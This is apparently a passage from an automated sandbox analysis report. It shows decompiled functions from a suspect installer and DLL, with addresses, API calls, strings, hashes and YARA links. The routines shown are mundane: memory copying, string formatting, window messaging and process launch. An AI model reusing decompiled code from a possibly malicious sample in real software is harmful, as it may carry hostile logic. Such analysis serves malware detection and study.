					 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
					_v16 =  *((intOrPtr*)(_a4 + 0x10));
					E6F1DAF00(_a4, _v12);
					_a12 = E6F1DC2B0(_a4, _v16,  *_a8, _a12, _a16 & 0x000000ff);
					0x6f1d0000("copying %p to %p\n", _v16,  *_a8);
					if( *_a8 != _v16) {
						E6F1E00E0( *_a8, _v16, _v12);
					}
					return 0;
				} else {
					0x6f1d0000("invalid format type %x\n",  *_v8 & 0x000000ff);
					 *0x6f1d0000(0x6e6);
					return 0;
				}
			}











                                                                                              0x6f1d3d09
                                                                                              0x6f1d3d22
                                                                                              0x6f1d3d27
                                                                                              0x6f1d3d33
                                                                                              0x6f1d3d78
                                                                                              0x6f1d3d7d
                                                                                              0x6f1d3d89
                                                                                              0x6f1d3da3
                                                                                              0x6f1d3dac
                                                                                              0x6f1d3db5
                                                                                              0x6f1d3d8b
                                                                                              0x6f1d3d92
                                                                                              0x6f1d3d9b
                                                                                              0x6f1d3d9b
                                                                                              0x6f1d3dbe
                                                                                              0x6f1d3de0
                                                                                              0x6f1d3df3
                                                                                              0x6f1d3df3
                                                                                              0x6f1d3dc0
                                                                                              0x6f1d3dc8
                                                                                              0x6f1d3dcd
                                                                                              0x6f1d3dd3
                                                                                              0x6f1d3dd3
                                                                                              0x6f1d3dfe
                                                                                              0x6f1d3e07
                                                                                              0x6f1d3e12
                                                                                              0x6f1d3e39
                                                                                              0x6f1d3e4b
                                                                                              0x6f1d3e5b
                                                                                              0x6f1d3e6b
                                                                                              0x6f1d3e70
                                                                                              0x00000000
                                                                                              0x6f1d3d40
                                                                                              0x6f1d3d4c
                                                                                              0x6f1d3d59
                                                                                              0x00000000
                                                                                              0x6f1d3d5f

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: (%p, %p, %p, %d)$copying %p to %p$invalid format type %x
                                                                                              • API String ID: 4104443479-4001265739
                                                                                              • Opcode ID: fd667360519f6820f88dac62b29f11ae77111a31de7a9f8fbb14ee9a597f2b36
                                                                                              • Instruction ID: 0041e816f0583099e8ac5e3c2f30aa31cc8d6285e07e84ccf150eb385c13cb2c
                                                                                              • Opcode Fuzzy Hash: fd667360519f6820f88dac62b29f11ae77111a31de7a9f8fbb14ee9a597f2b36
                                                                                              • Instruction Fuzzy Hash: 7D5152B5A04248AFCB04CF98D8919AEBBB5EF49344F14C199F8199B345D731EA61CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1D41B0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 101COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 28%
                                                                                              			E6F1D41B0(intOrPtr _a4, intOrPtr _a8, signed char* _a12, signed int _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _t71;
				void* _t99;
				void* _t100;

				_v12 = 0;
				0x6f1d0000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				if(( *_a12 & 0x000000ff) == 0x21) {
					_v16 =  *((intOrPtr*)(_a4 + 0x30));
					_v8 =  *((intOrPtr*)(_a4 + 4));
					 *((intOrPtr*)(_a4 + 0x30)) = 1;
					 *((intOrPtr*)(_a4 + 0x18)) = 0;
					E6F1D6490(_a4, _a12);
					 *((intOrPtr*)(_a4 + 0x30)) = _v16;
					0x6f1d0000("difference = 0x%x\n",  *((intOrPtr*)(_a4 + 4)) - _v8);
					if( *((intOrPtr*)(_a4 + 0x34)) == 0) {
						 *((intOrPtr*)(_a4 + 0x34)) =  *((intOrPtr*)(_a4 + 4));
						_v12 = 1;
					}
					 *((intOrPtr*)(_a4 + 4)) = _v8;
					E6F1DD650(0x21, _a4, _a12);
					E6F1DD830(_t71, _t99, _t100, 0x21, _a4, _a8, _a12, _a16 & 0x000000ff, 1, 1);
					if(_v12 != 0) {
						 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 0x34));
						 *((intOrPtr*)(_a4 + 0x34)) = 0;
					}
					return 0;
				}
				0x6f1d0000("invalid format type %x\n",  *_a12 & 0x000000ff);
				 *0x6f1d0000(0x6e6);
				return 0;
			}









                                                                                              0x6f1d41b6
                                                                                              0x6f1d41d3
                                                                                              0x6f1d41ed
                                                                                              0x6f1d4224
                                                                                              0x6f1d422d
                                                                                              0x6f1d4233
                                                                                              0x6f1d423d
                                                                                              0x6f1d424c
                                                                                              0x6f1d4257
                                                                                              0x6f1d4269
                                                                                              0x6f1d4278
                                                                                              0x6f1d4283
                                                                                              0x6f1d4286
                                                                                              0x6f1d4286
                                                                                              0x6f1d4293
                                                                                              0x6f1d42a0
                                                                                              0x6f1d42bf
                                                                                              0x6f1d42cb
                                                                                              0x6f1d42d6
                                                                                              0x6f1d42dc
                                                                                              0x6f1d42dc
                                                                                              0x00000000
                                                                                              0x6f1d42e3
                                                                                              0x6f1d4204
                                                                                              0x6f1d4211
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • _NdrComplexArrayMemorySize@8.RGSBZEOG(?,?), ref: 6F1D424C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: ArrayComplexMemorySize@8
                                                                                              • String ID: (%p,%p,%p,%d)$difference = 0x%x$invalid format type %x
                                                                                              • API String ID: 2085160478-2050479018
                                                                                              • Opcode ID: aa3fb9a950900c40074ee04d67a230966b039350a74236e4dddd9b35cb4f8ce8
                                                                                              • Instruction ID: 2a476676d2754548512cbb69fc9459b4cc21f0c31d3736dd6e3fa2e81433202f
                                                                                              • Opcode Fuzzy Hash: aa3fb9a950900c40074ee04d67a230966b039350a74236e4dddd9b35cb4f8ce8
                                                                                              • Instruction Fuzzy Hash: 31410EB5600208AFDB04CF94C994F9A7BB5BF88344F14C159FD488B385D771EA91CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004044B6, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 51%
                                                                                              			E004044B6(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E0040594D(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E0040594D(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E0040594D(_t34, 0, 0x429fd8, 0x429fd8, _a8);
				wsprintfA(_t26 + lstrlenA(0x429fd8), "%u.%u%s%s");
				return SetDlgItemTextA( *0x42e338, _a4, 0x429fd8);
			}













                                                                                              0x004044be
                                                                                              0x004044c2
                                                                                              0x004044ca
                                                                                              0x004044cd
                                                                                              0x004044ce
                                                                                              0x004044d0
                                                                                              0x004044d2
                                                                                              0x004044d5
                                                                                              0x004044d5
                                                                                              0x004044dc
                                                                                              0x004044e2
                                                                                              0x004044e2
                                                                                              0x004044e9
                                                                                              0x004044f4
                                                                                              0x004044f5
                                                                                              0x004044f8
                                                                                              0x004044f8
                                                                                              0x00404505
                                                                                              0x00404510
                                                                                              0x00404513
                                                                                              0x00404525
                                                                                              0x0040452c
                                                                                              0x0040452d
                                                                                              0x0040453c
                                                                                              0x0040454c
                                                                                              0x00404568

                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(00429FD8,00429FD8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004043D6,000000DF,0000040F,00000400,00000000), ref: 00404544
                                                                                              • wsprintfA.USER32 ref: 0040454C
                                                                                              • SetDlgItemTextA.USER32 ref: 0040455F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                              • String ID: %u.%u%s%s
                                                                                              • API String ID: 3540041739-3551169577
                                                                                              • Opcode ID: 9ef419584118109bfe096c59dc58bdf2b1081d5b2e965ff29ec39ca84245abfe
                                                                                              • Instruction ID: e44b7de75f1afc080fd53ae6a7962c6c3308310fc923ee70d3b0388825d49f6b
                                                                                              • Opcode Fuzzy Hash: 9ef419584118109bfe096c59dc58bdf2b1081d5b2e965ff29ec39ca84245abfe
                                                                                              • Instruction Fuzzy Hash: CE11E2B3A0022467DB10A66A9C05EAF36599BC2334F14023BFA29F61D1E9388C1186A8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 51%
                                                                                              			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029CB(3);
				 *(_t55 + 8) = E004029CB(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029E8(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029E8();
					_t28 = E004029E8();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029CB();
					_t37 = E004029CB();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E00405889();
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                                                              0x00401bb6
                                                                                              0x00401bc2
                                                                                              0x00401bc5
                                                                                              0x00401bce
                                                                                              0x00401bce
                                                                                              0x00401bd1
                                                                                              0x00401bd5
                                                                                              0x00401bde
                                                                                              0x00401bde
                                                                                              0x00401be1
                                                                                              0x00401be5
                                                                                              0x00401be7
                                                                                              0x00401c34
                                                                                              0x00401c36
                                                                                              0x00401c3f
                                                                                              0x00401c47
                                                                                              0x00401c4a
                                                                                              0x00401c4a
                                                                                              0x00401c53
                                                                                              0x00000000
                                                                                              0x00401be9
                                                                                              0x00401bf0
                                                                                              0x00401bf2
                                                                                              0x00401bfa
                                                                                              0x00401bfd
                                                                                              0x00401c25
                                                                                              0x00401c59
                                                                                              0x00401c59
                                                                                              0x00401bff
                                                                                              0x00401c0d
                                                                                              0x00401c15
                                                                                              0x00401c18
                                                                                              0x00401c18
                                                                                              0x00401bfd
                                                                                              0x00401c5c
                                                                                              0x00401c5f
                                                                                              0x00401c65
                                                                                              0x00402825
                                                                                              0x00402825
                                                                                              0x00402880
                                                                                              0x0040288c

                                                                                              APIs
                                                                                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                                                              • SendMessageA.USER32 ref: 00401C25
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Timeout
                                                                                              • String ID: !
                                                                                              • API String ID: 1777923405-2657877971
                                                                                              • Opcode ID: 672c969f6ffa347aa3c7b0db73338ddc2672c41c0f2d80c96ed6a2b1a5ff1745
                                                                                              • Instruction ID: 5ea9a142a0052d8e356a619bc15d353e54371354b2f8ef601c25db15878fdf82
                                                                                              • Opcode Fuzzy Hash: 672c969f6ffa347aa3c7b0db73338ddc2672c41c0f2d80c96ed6a2b1a5ff1745
                                                                                              • Instruction Fuzzy Hash: 0A2183B1A44104AEEF01AFB5CD5BAAD7A75EF41704F14047AF501B61D1D6B88940D728
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040518B, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040518B(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42bfe0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42bfe0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                              0x00405194
                                                                                              0x004051b0
                                                                                              0x004051b8
                                                                                              0x004051bd
                                                                                              0x00000000
                                                                                              0x004051c3
                                                                                              0x004051c7

                                                                                              APIs
                                                                                              Strings
                                                                                              • Error launching installer, xrefs: 0040519E
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040518B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleProcess
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                                                                              • API String ID: 3712363035-7751565
                                                                                              • Opcode ID: b38c976d41fbf5581cd3581743b2c772e0e0d761a2224e88a4e7645e11274b50
                                                                                              • Instruction ID: 2907f660324095bb22c49bf820cefbd87778b5f2e5ee3a47b55f65b03477d649
                                                                                              • Opcode Fuzzy Hash: b38c976d41fbf5581cd3581743b2c772e0e0d761a2224e88a4e7645e11274b50
                                                                                              • Instruction Fuzzy Hash: D6E0ECB4A14209ABEB10DF74ED0AE6F7BBCFB00344B408522AD11E2250D779E410CAB9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040541E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040541E(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40900c);
				}
				return _t7;
			}




                                                                                              0x0040541f
                                                                                              0x00405436
                                                                                              0x0040543e
                                                                                              0x0040543e
                                                                                              0x00405446

                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030CD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405424
                                                                                              • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030CD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 0040542D
                                                                                              • lstrcatA.KERNEL32(?,0040900C), ref: 0040543E
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040541E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 2659869361-823278215
                                                                                              • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                                                                                              • Instruction ID: 104188ff39e6d10e0057bf8a610b6096ce4ad2879363e85d627e75dd9bc73d26
                                                                                              • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                                                                                              • Instruction Fuzzy Hash: 04D0A9A2609A70BEE20227159C05ECB2E08CF02729B048422F140B22D2C33C4E82CFFE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1DD120, Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 178COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: string=%s$string=%s$unknown array format 0x%x
                                                                                              • API String ID: 0-3150054447
                                                                                              • Opcode ID: f04ada7ef7fb09ec976e6a8e88c7cb0f3baff8244448e347403d47e7a6e630a5
                                                                                              • Instruction ID: 67e47e73d749bf02793de6fb6bc342c5338d7b1643cbd90dda5d3c1ea4a84b26
                                                                                              • Opcode Fuzzy Hash: f04ada7ef7fb09ec976e6a8e88c7cb0f3baff8244448e347403d47e7a6e630a5
                                                                                              • Instruction Fuzzy Hash: 766130F5900209AFCB04CFA8D981AAF77B5EF48348F048559F9199B345D732EA21CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1DCC40, Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 175COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: string=%s$string=%s$unknown array format 0x%x
                                                                                              • API String ID: 0-3150054447
                                                                                              • Opcode ID: b216aeb572fa7134cd08b6261fa912d7276571accdae1bbe1af3a6c8569d2312
                                                                                              • Instruction ID: b5e15a0f39fb45254960471728b6111c28a827ab7aad23dcc46c73a25f99e3e3
                                                                                              • Opcode Fuzzy Hash: b216aeb572fa7134cd08b6261fa912d7276571accdae1bbe1af3a6c8569d2312
                                                                                              • Instruction Fuzzy Hash: 756155F5A00209AFCB04DF68D890AAF7BB5AF49348F04C559FD199B345D632E921CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1E7336, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E6F1E7336(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E6F1E1DE3( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E6F1E717C( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E6F1E2A54(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}
















                                                                                              0x6f1e733e
                                                                                              0x6f1e7343
                                                                                              0x6f1e735d
                                                                                              0x00000000
                                                                                              0x6f1e735d
                                                                                              0x6f1e7345
                                                                                              0x6f1e734a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1e734f
                                                                                              0x6f1e736c
                                                                                              0x6f1e7371
                                                                                              0x6f1e7374
                                                                                              0x6f1e737b
                                                                                              0x6f1e739a
                                                                                              0x6f1e73a1
                                                                                              0x6f1e73a3
                                                                                              0x6f1e73e7
                                                                                              0x6f1e73f6
                                                                                              0x6f1e7404
                                                                                              0x6f1e7406
                                                                                              0x6f1e7416
                                                                                              0x6f1e7416
                                                                                              0x6f1e741a
                                                                                              0x6f1e741c
                                                                                              0x6f1e741f
                                                                                              0x6f1e741f
                                                                                              0x6f1e741f
                                                                                              0x6f1e741f
                                                                                              0x00000000
                                                                                              0x6f1e7425
                                                                                              0x6f1e7408
                                                                                              0x6f1e7408
                                                                                              0x6f1e740d
                                                                                              0x6f1e740d
                                                                                              0x6f1e7410
                                                                                              0x00000000
                                                                                              0x6f1e7410
                                                                                              0x6f1e73a5
                                                                                              0x6f1e73a8
                                                                                              0x6f1e73ac
                                                                                              0x6f1e73d5
                                                                                              0x6f1e73d5
                                                                                              0x6f1e73d8
                                                                                              0x6f1e73d8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1e73da
                                                                                              0x6f1e73de
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1e73e0
                                                                                              0x6f1e73e0
                                                                                              0x00000000
                                                                                              0x6f1e73e0
                                                                                              0x6f1e73ae
                                                                                              0x6f1e73b1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1e73b5
                                                                                              0x6f1e73c8
                                                                                              0x6f1e73ce
                                                                                              0x6f1e73d1
                                                                                              0x6f1e73d3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1e73d3
                                                                                              0x6f1e737d
                                                                                              0x6f1e7380
                                                                                              0x6f1e7382
                                                                                              0x6f1e7387
                                                                                              0x6f1e7387
                                                                                              0x6f1e738c
                                                                                              0x00000000
                                                                                              0x6f1e738c
                                                                                              0x6f1e7351
                                                                                              0x6f1e7356
                                                                                              0x6f1e735a
                                                                                              0x6f1e735a
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6F1E736C
                                                                                              • __isleadbyte_l.LIBCMT ref: 6F1E739A
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 6F1E73C8
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 6F1E73FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
